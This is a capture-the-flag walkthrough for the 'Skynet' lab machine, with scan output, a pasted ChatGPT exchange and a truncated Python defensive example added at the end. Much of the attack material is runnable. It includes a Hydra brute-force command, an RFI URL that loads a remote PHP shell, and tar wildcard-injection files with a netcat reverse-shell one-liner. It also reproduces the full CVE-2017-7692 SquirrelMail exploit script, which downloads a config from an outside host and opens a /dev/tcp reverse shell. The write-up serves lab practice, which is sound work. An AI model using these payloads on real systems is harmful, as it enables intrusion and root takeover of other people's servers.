🦾SKYNET
1. RECONNAISSANCE:
Starting with reconnaissance, I focused on enumerating the website's directories using gobuster and dirb's common.txt wordlist.
gobuster dir -u http://10.10.131.229 -w /usr/share/wordlists/dirb/common.txt
Among the results, the /squirrelmail directory stood out. I decided to run a full nmap scan to get more detailed information and saved it to an XML file, to convert it to HTML later.
nmap -sS -sV -O --script=vuln 10.10.131.229
This produced a detailed nmap report that was crucial for the next phase.
2. THE SAMBA SMB SERVICE EXPOSED A SHARE WITHOUT CREDENTIALS CALLED ANONYMOUS:
The nmap scan revealed ports 139 and 445 open, indicating SMB was present. I used smbclient to enumerate the SMB shares, then connected to the anonymous one.
smbclient -L 10.10.131.229 -N
smbclient //10.10.131.229/anonymous -N
I found an anonymous share and explored its contents. I found the file attention.txt, which revealed the username Miles Dyson. In addition, in log1.txt I found a set of passwords that we will use later to brute-force the squirrelmail login.
3. BRUTE-FORCED CREDENTIALS obtained with HYDRA, and we also did it with BURP SUITE:
I decided to use the credentials found to run a brute-force attack against the mail service hosted at /squirrelmail. I used Burp Suite Intruder to perform the brute-force attack.
After some time, I obtained the password cyborg007haloterminator. I logged into the mailbox and found the key for the next task, which was on the SMB service.
And with HYDRA I achieved the same with the following command (-f stops after the first valid pair):
hydra -l miles -P passwdskynet.txt 10.10.131.229 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font><b>ERROR</b></font>" -vv -t 1 -f
4. LOGGING INTO THE SAMBA SHARE:
I accessed the SMB share milesdyson using the credentials obtained. I explored its contents and found the file important.txt, which revealed a hidden secret directory.
5. Directory brute-forcing:
With the hidden directory /45kra24zxs28v3yd/ discovered, I used gobuster again to find the admin panel /administrator, which redirects to a Cuppa CMS login page.
gobuster dir -u http://10.10.131.229/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt
6. RFI (Remote File Inclusion):
I discovered an LFI and remote file inclusion (RFI) vulnerability in Cuppa CMS thanks to an exploit script that claimed to exploit it. I verified the vulnerability by trying to access /etc/passwd through the website.
Then I used the RFI vulnerability to include a remote PHP shell (shellpaimon.php) created with MSFVENOM, serving it from a Python web server on my attacking machine and feeding it to CUPPA through the RFI in its URL like this: (http://10.10.131.229/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.241.89:8080/shellpaimon.php), then set up a Netcat listener.
nc -nlvp 4444
Visiting the URL with the RFI payload, I obtained an interactive shell.
7. Privilege escalation:
While exploring the cron jobs, I found a script (backup.sh) executed as root. I couldn't edit it directly, so we created some files with touch using special names that tar would then mishandle as if they were commands; since the crontab used this tar to compress everything in the html path, it would run them as ROOT and execute shell.sh, giving us a reverse shell and a root shell on our listening netcat.
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.241.89 4445 >/tmp/f" > /var/www/html/shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
With this, I obtained a root shell and completed the machine.
FULL EXPLANATION OF THE VULNERABILITY THAT ENABLED THE PRIVILEGE ESCALATION:
ME:
Look, there are some crontabs executed by root that point to running this file, with this content:
cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
And if we look at this .sh script, it goes to the directory /var/www/html with cd and uses tar to compress everything in it. Would the vulnerability be here, in the way tar handles the special names of the files we created earlier when compressing them, so that because of this vulnerability it actually ends up executing them as root, indirectly giving me a root shell on my netcat?
ChatGPT:
Yes, it looks like you have correctly identified the possible vulnerability in the backup.sh script that is run as root through the crontabs. Let's analyse it in detail:
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz * .
Here is what the script does:
Changes to the directory /var/www/html.
Uses the tar command to create a backup.tgz file in the directory /home/milesdyson/backups. tar cf /home/milesdyson/backups/backup.tgz * . indicates that everything (*) in the current directory (.) should be included in the backup.tgz file.
Now, if we recall the files you created earlier:
/var/www/html/--checkpoint-action=exec=sh shell.sh
/var/www/html/--checkpoint=1
It seems you could take advantage of the vulnerability in how tar handles special filenames. If the backup script (backup.sh) is run by root, and tar misinterprets the special filenames, you could achieve arbitrary command execution in the context of root.
This could be a case of command injection through malicious filenames that tar interprets incorrectly. Further testing will be needed to confirm exploitation of this specific vulnerability.
/////////////////////////////////////////// SKYNET ///////////////////////////////////////
A vulnerable Linux machine with a Terminator theme.
---------------- MACHINE RECONNAISSANCE: -----------
┌──(root㉿kali)-[~]
└─# ping 10.10.37.190
PING 10.10.37.190 (10.10.37.190) 56(84) bytes of data.
64 bytes from 10.10.37.190: icmp_seq=1 ttl=64 time=0.904 ms
64 bytes from 10.10.37.190: icmp_seq=2 ttl=64 time=0.387 ms
64 bytes from 10.10.37.190: icmp_seq=3 ttl=64 time=0.418 ms
^C
--- 10.10.37.190 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2045ms
rtt min/avg/max/mdev = 0.387/0.569/0.904/0.236 ms
------------------ NMAP ----------------
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -O --script="vuln" 10.10.37.190
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-03 00:50 UTC
Stats: 0:00:06 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Stats: 0:01:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.61% done; ETC: 00:52 (0:00:00 remaining)
Stats: 0:04:11 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.61% done; ETC: 00:54 (0:00:01 remaining)
Stats: 0:04:21 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.61% done; ETC: 00:54 (0:00:01 remaining)
Nmap scan report for ip-10-10-37-190.eu-west-1.compute.internal (10.10.37.190)
Host is up (0.00037s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.2p2:
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.18:
| http-enum:
| /squirrelmail/src/login.php: squirrelmail version 1.4.23 [svn]
|_ /squirrelmail/images/sm_logo.png: SquirrelMail
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=ip-10-10-37-190.eu-west-1.compute.internal
| Found the following possible CSRF vulnerabilities:
|
| Path: http://ip-10-10-37-190.eu-west-1.compute.internal:80/
| Form id:
|_ Form action: #
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 02:FE:2F:A7:DB:E9 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=2/3%OT=22%CT=1%CU=43544%PV=Y%DS=1%DC=D%G=Y%M=02FE2F%TM
OS:=65BD8F17%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=I%II=I%
OS:TS=8)OPS(O1=M2301ST11NW7%O2=M2301ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW
OS:7%O5=M2301ST11NW7%O6=M2301ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68
OS:DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=
OS:40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%
OS:O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=4
OS:0%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=
OS:Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 344.52 seconds
------------------ BURPSUITE ----------------
REQUEST FROM THE SKYNET SEARCH BUTTON:
POST / HTTP/1.1
Host: 10.10.37.190
Content-Length: 20
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.37.190
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.37.190/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Connection: close
submit=Skynet+Search
RESPONSE:
IT RETURNS NO VISIBLE RESULT
REQUEST FROM THE I'M FEELING LUCKY BUTTON:
POST / HTTP/1.1
Host: 10.10.37.190
Content-Length: 25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.37.190
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.37.190/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Connection: close
lucky=I%27m+Feeling+Lucky
RESPONSE:
IT RETURNS NOTHING EITHER, FOR THE MOMENT.
REQUEST TRYING A BASIC INJECTION TO ATTEMPT A LOGIN BYPASS, ASSUMING THERE IS AN ADMINISTRATOR USER; THE submit VARIABLE THAT THE FIRST BUTTON SENDS IN THE CAPTURED REQUEST IS WHAT CAUGHT OUR ATTENTION:
POST / HTTP/1.1
Host: 10.10.37.190
Content-Length: 33
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.37.190
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.37.190/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Connection: close
submit=administrator' or 1=1 -- -
RESPONSE :
NO FAVORABLE RESULT; IT SHOWS US THE SAME PAGE
--------------------- GOBUSTER ---------------
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://10.10.37.190/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.37.190/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2024/02/03 01:12:21 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/admin (Status: 301) [Size: 312] [--> http://10.10.37.190/admin/]
/config (Status: 301) [Size: 313] [--> http://10.10.37.190/config/]
/css (Status: 301) [Size: 310] [--> http://10.10.37.190/css/]
/index.html (Status: 200) [Size: 523]
/js (Status: 301) [Size: 309] [--> http://10.10.37.190/js/]
/server-status (Status: 403) [Size: 277]
/squirrelmail (Status: 301) [Size: 319] [--> http://10.10.37.190/squirrelmail/]
Progress: 4614 / 4615 (99.98%)===============================================================
2024/02/03 01:12:23 Finished
===============================================================
------------ WE ANALYZE THE PATHS OBTAINED WITH THE NMAP VULN SCRIPT AND WITH GOBUSTER: --------------
http://10.10.37.190/squirrelmail/src/login.php
ON THE WEB PAGE WE SEE THE SQUIRRELMAIL SERVICE VERSION 1.4.23 SVN:
SquirrelMail Logo
SquirrelMail version 1.4.23 [SVN]
By the SquirrelMail Project Team
SquirrelMail Login
Name:
Password:
----
http://10.10.37.190/admin/
VIA THE WEB IT RESPONDED THAT WE DO NOT HAVE PERMISSION:
Forbidden
You don't have permission to access this resource.
Apache/2.4.18 (Ubuntu) Server at 10.10.37.190 Port 80
----------------
http://10.10.37.190/config/
WE DO NOT HAVE PERMISSION HERE EITHER:
Forbidden
You don't have permission to access this resource.
Apache/2.4.18 (Ubuntu) Server at 10.10.37.190 Port 80
---------------- BURPSUITE -------------
WE CAPTURE THE SQUIRRELMAIL LOGIN REQUESTS TO INSPECT THEM AND, WITH REPEATER, TRY A BASIC INJECTION TO BYPASS THE LOGIN AS ADMIN; BUT IT DID NOT WORK:
REQUEST:
POST /squirrelmail/src/redirect.php HTTP/1.1
Host: 10.10.37.190
Content-Length: 97
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.37.190
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.37.190/squirrelmail/src/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: squirrelmail_language=en_US; SQMSESSID=8r65d5g44c98aastt1rt02nkr5
Connection: close
login_username=administrator%27+or+1%3D1+--+-&secretkey=&js_autodetect_results=1&just_logged_in=1
RESPONSE; I THINK WE SEE SOME CLUES HERE:
HTTP/1.1 200 OK
Date: Sat, 03 Feb 2024 01:26:35 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Sat, 1 Jan 2000 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; path=/squirrelmail/; HttpOnly
Set-Cookie: squirrelmail_language=en_US; expires=Mon, 04-Mar-2024 01:26:35 GMT; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=c6h59js459okqlh1lge91nfkj2; path=/squirrelmail/
Set-Cookie: SQMSESSID=c6h59js459okqlh1lge91nfkj2; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=c6h59js459okqlh1lge91nfkj2; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/squirrelmail/src; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/squirrelmail/src/; HttpOnly
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 1789
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="robots" content="noindex,nofollow">
<meta http-equiv="x-dns-prefetch-control" content="off">
<script type="text/javascript" language="JavaScript">
<!--
if (self != top) { try { if (document.domain != top.document.domain) { throw "Clickjacking security violation! Please log out immediately!"; /* this code should never execute - exception should already have been thrown since it's a security violation in this case to even try to access top.document.domain (but it's left here just to be extra safe) */ } } catch (e) { self.location = "/squirrelmail/src/signout.php"; top.location = "/squirrelmail/src/signout.php" } }
// -->
</script>
<title>SquirrelMail - Unknown user or password incorrect.</title>
<!--[if IE 6]>
<style type="text/css">
/* avoid stupid IE6 bug with frames and scrollbars */
body {
width: expression(document.documentElement.clientWidth - 30);
}
</style>
<![endif]-->
</head>
<body text="#000000" bgcolor="#ffffff" link="#0000cc" vlink="#0000cc" alink="#0000cc">
<center><img src="../images/sm_logo.png" alt="SquirrelMail Logo" width="308" height="111" /><br />
<small>SquirrelMail version 1.4.23 [SVN]<br />By the SquirrelMail Project Team<br /></small>
<table cellspacing="1" cellpadding="0" bgcolor="#800000" width="70%"><tr><td><table width="100%" border="0" bgcolor="#ffffff" align="center"><tr><td bgcolor="#dcdcdc" align="center"><font color="#cc0000"><b>ERROR</b></font></td></tr><tr><td align="center">Unknown user or password incorrect.</td></tr><tr><td bgcolor="#dcdcdc" align="center"><font color="#cc0000"><b><a href="/squirrelmail/src/login.php" target="_top">Go to the login page</a></b></font></td></tr></table></td></tr></table></center></body></html>
THE COMMENTS CATCH OUR ATTENTION; WE WILL LOOK AT THEM LATER. THE PARTS OF THE RESPONSE WE NOTED ARE: THE CLICKJACKING CHECK THAT REDIRECTS TO /squirrelmail/src/signout.php, THE "Unknown user or password incorrect." TITLE, THE IE6 FRAMES/SCROLLBAR WORKAROUND, AND THE BANNER "SquirrelMail version 1.4.23 [SVN] By the SquirrelMail Project Team".
WE ALSO TRIED THE PATH THAT SHOWED UP IN THE RESPONSE, BECAUSE IT SEEMED TO SAY WE WERE LOGGED IN AS WELL; IT WAS NOT VERY CLEAR, BUT ON REQUESTING THIS PATH IT TOLD US WE HAD SIGNED OUT SUCCESSFULLY AND SHOWED A BUTTON TO GO BACK TO THE START. WE CAPTURED THESE REQUESTS TO GATHER MORE INFO, BUT IN THE END IT TOOK US BACK TO THE LOGIN:
http://10.10.37.190/squirrelmail/src/signout.php
REQUEST:
GET /squirrelmail/src/login.php HTTP/1.1
Host: 10.10.37.190
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.37.190/squirrelmail/src/signout.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: squirrelmail_language=en_US; SQMSESSID=07qt4gq6rtjgqb5k8t4oqicgn3
Connection: close
-------------------- SEARCHSPLOIT -------------
┌──(root㉿kali)-[~]
└─# searchsploit SquirrelMail 1.4
----------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------- ---------------------------------
SquirrelMail 1.4.2 Address Add Plugin - 'add.php' Cross-Site Scripting | php/webapps/26305.txt
Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion | php/webapps/27948.txt
SquirrelMail 1.4.x - Folder Name Cross-Site Scripting | php/webapps/24068.txt
SquirrelMail < 1.4.22 - Remote Code Execution | linux/remote/41910.sh
SquirrelMail < 1.4.5-RC1 - Arbitrary Variable Overwrite | php/webapps/43830.txt
SquirrelMail < 1.4.7 - Arbitrary Variable Overwrite | php/webapps/43839.txt
----------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[~]
└─# searchsploit -m linux/remote/41910.sh
Exploit: SquirrelMail < 1.4.22 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/41910
Path: /usr/share/exploitdb/exploits/linux/remote/41910.sh
File Type: Bourne-Again shell script, ASCII text executable
Copied to: /root/41910.sh
┌──(root㉿kali)-[~]
└─# ls
41910.sh Desktop Documents Downloads Music Pictures Public Templates Videos
┌──(root㉿kali)-[~]
└─# mv 41910.sh exploitpaimon.sh
┌──(root㉿kali)-[~]
└─# cat exploitpaimon.sh
#!/bin/bash
#
int='\033[94m
__ __ __ __ __
/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
/ / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
/_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
/____/
SquirrelMail <= 1.4.23 Remote Code Execution PoC Exploit (CVE-2017-7692)
SquirrelMail_RCE_exploit.sh (ver. 1.1)
Discovered and coded by
Dawid Golunski (@dawid_golunski)
https://legalhackers.com
ExploitBox project:
https://ExploitBox.io
\033[0m'
# Quick and messy PoC for SquirrelMail webmail application.
# It contains payloads for 2 vectors:
# * File Write
# * RCE
# It requires user credentials and that SquirrelMail uses
# Sendmail method as email delivery transport
#
#
# Full advisory URL:
# https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
# Exploit URL:
# https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh
#
# Tested on: # Ubuntu 16.04
# squirrelmail package version:
# 2:1.4.23~svn20120406-2ubuntu1.16.04.1
#
# Disclaimer:
# For testing purposes only
#
#
# -----------------------------------------------------------------
#
# Interested in vulns/exploitation?
# Stay tuned for my new project - ExploitBox
#
# .;lc'
# .,cdkkOOOko;.
# .,lxxkkkkOOOO000Ol'
# .':oxxxxxkkkkOOOO0000KK0x:'
# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.
# '';ldxxxxxdc,. ,oOXXXNNNXd;,.
# .ddc;,,:c;. ,c: .cxxc:;:ox:
# .dxxxxo, ., ,kMMM0:. ., .lxxxxx:
# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:
# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:
# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:
# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:
# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:
# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:
# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:
# .dxxxxxdl;. ., .. .;cdxxxxxx:
# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:
# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.
# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
# .':oxxxxxxxxx.ckkkkkkkkxl,.
# .,cdxxxxx.ckkkkkxc.
# .':odx.ckxl,.
# .,.'.
#
# https://ExploitBox.io
#
# https://twitter.com/Exploit_Box
#
# -----------------------------------------------------------------
sqspool="/var/spool/squirrelmail/attach/"
echo -e "$int"
#echo -e "\033[94m \nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \n"
#echo -e "SquirrelMail_RCE_exploit.sh (ver. 1.0)\n"
#echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m\n\n"
# Base URL
if [ $# -ne 1 ]; then
echo -e "Usage: \n$0 SquirrelMail_URL"
echo -e "Example: \n$0 http://target/squirrelmail/ \n"
exit 2
fi
URL="$1"
# Log in
echo -e "\n[*] Enter SquirrelMail user credentials"
read -p "user: " squser
read -sp "pass: " sqpass
echo -e "\n\n[*] Logging in to SquirrelMail at $URL"
curl -s -D /tmp/sqdata -d"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1" $URL/src/redirect.php | grep -q incorrect
if [ $? -eq 0 ]; then
echo "Invalid creds"
exit 2
fi
sessid="`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"
keyid="`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"
# Prepare Sendmail cnf
#
# * The config will launch php via the following stanza:
#
# Mlocal, P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,
# T=DNS/RFC822/X-Unix,
# A=php -- $u $h ${client_addr}
#
wget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf
# Upload config
echo -e "\n\n[*] Uploading Sendmail config"
token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/compose.php?mailbox=INBOX&startMessage=1" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"
attachid="`curl -H "Expect:" -s -b"SQMSESSID=$sessid; key=$keyid" -F"smtoken=$token" -F"send_to=$mail" -F"subject=attach" -F"body=test" -F"attachfile=@/tmp/smcnf-exp" -F"username=$squser" -F"attach=Add" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'"' '{print $2}' | tr -d '\n'`"
if [ ${#attachid} -lt 32 ]; then
echo "Something went wrong. Failed to upload the sendmail file."
exit 2
fi
# Create Sendmail cmd string according to selected payload
echo -e "\n\n[?] Select payload\n"
# SELECT PAYLOAD
echo "1 - File write (into /tmp/sqpoc)"
echo "2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)"
echo
read -p "[1-2] " pchoice
case $pchoice in
1) payload="$squser@localhost -oQ/tmp/ -X/tmp/sqpoc"
;;
2) payload="$squser@localhost -oQ/tmp/ -C$sqspool/$attachid"
;;
esac
if [ $pchoice -eq 2 ]; then
echo
read -p "Reverese shell IP: " reverse_ip
read -p "Reverese shell PORT: " reverse_port
fi
# Reverse shell code
phprevsh="
<?php
\$cmd = \"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\";
file_put_contents(\"/tmp/cmd\", 'export PATH=\"\$PATH\" ; export TERM=vt100 ;' . \$cmd);
system(\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\");
?>"
# Set sendmail params in user settings
echo -e "\n[*] Injecting Sendmail command parameters"
token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"
curl -s -b"SQMSESSID=$sessid; key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" --data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/null
if [ $? -ne 0 ]; then
echo "Failed to inject sendmail parameters"
exit 2
fi
# Send email which triggers the RCE vuln and runs phprevsh
echo -e "\n[*] Sending the email to trigger the vuln"
(sleep 2s && curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid; key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" \
-d"send_to=$squser@localhost" -d"subject=poc" --data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) &
if [ $pchoice -eq 2 ]; then
echo -e "\n[*] Waiting for shell on $reverse_ip port $reverse_port"
nc -vv -l -p $reverse_port
else
echo -e "\n[*] The test file should have been written at /tmp/sqpoc"
fi
grep -q "302 Found" /tmp/sheaders
if [ $? -eq 1 ]; then
echo "There was a problem with sending email"
exit 2
fi
# Done
echo -e "\n[*] All done. Exiting"
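The script above works by storing sendmail options inside the user's saved e-mail address, and its own header says it needs valid credentials and the Sendmail delivery transport. As an added example, not part of this writeup and not SquirrelMail's code, here is that weakness in Python from the defender's side: the vulnerable shape, which pastes the address into a shell command string, next to a hardened shape that allowlists the address syntax and hands it to sendmail as a single argv element with no shell in between. The sendmail path, the function names and the sample addresses are assumptions made for this example.

```python
"""Added example (not from the writeup, not SquirrelMail code): keeping a
user-controlled sender address out of sendmail's option parsing, the
weakness behind CVE-2017-7692. Names and sample values are constructed."""
import re
import shlex

SENDMAIL = "/usr/sbin/sendmail"  # assumed binary path (typical Debian/Ubuntu)

# Allowlist for a plain address: local part, '@', dotted host labels.
# Nothing matching this can contain whitespace, quotes or a leading dash.
_ADDR_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*$")


def build_sendmail_cmd_unsafe(sender: str) -> str:
    """Vulnerable shape: the address is concatenated into a shell string,
    so a saved address such as 'u@localhost -oQ/tmp/ -C/path/cfg' turns
    into extra sendmail options once the shell splits the string."""
    return f"{SENDMAIL} -i -f {sender} -t"


def address_tokens(sender: str) -> list:
    """What the unsafe shape actually hands to sendmail in the address
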